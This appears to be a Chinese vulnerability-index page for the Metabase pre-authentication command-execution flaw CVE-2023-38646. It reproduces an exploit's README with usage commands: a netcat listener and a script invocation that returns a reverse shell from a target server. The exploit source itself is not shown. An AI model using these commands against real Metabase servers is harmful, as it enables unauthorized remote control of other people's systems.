关联漏洞
标题:
Metabase 安全漏洞
(CVE-2023-38646)
描述:Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以运行该服务的权限在服务器上执行任意命令。
介绍
# CVE-2023-38646-exploit
"This vulnerability, designated as CVE-2023–38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication."
A quick reverse shell exploit script for cve-2023-38646.
I did not find this vulnerability, just made the script.
## Usage
root@box:~/CVE-2023-38646# python3 exploit.py
_______ ________ ___ ___ ___ ____ ____ ___ __ _ _ __
/ ____\ \ / / ____| |__ \ / _ \__ \|___ \ |___ \ / _ \ / /| || | / /
| | \ \ / /| |__ ______ ) | | | | ) | __) |_____ __) | (_) |/ /_| || |_ / /_
| | \ \/ / | __|______/ /| | | |/ / |__ <______|__ < > _ <| '_ \__ _| '_ \
| |____ \ / | |____ / /_| |_| / /_ ___) | ___) | (_) | (_) | | | | (_) |
\_____| \/ |______| |____|\___/____|____/ |____/ \___/ \___/ |_| \___/
author: c0rnbread
credits:
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py
Usage: python3 exploit.py <url> <local-ip> <local-port>
Run using base url and local IP and port for reverse shell
root@box:~/CVE-2023-38646# nc -lvnp 4444
root@box:~/CVE-2023-38646# python3 exploit.py http://example.com 10.10.10.2 4444
### Credits
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py
文件快照
[4.0K] /data/pocs/c4253b4c50a613f78d93346a9dff2d68f4a046a4
├── [2.8K] exploit.py
└── [1.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。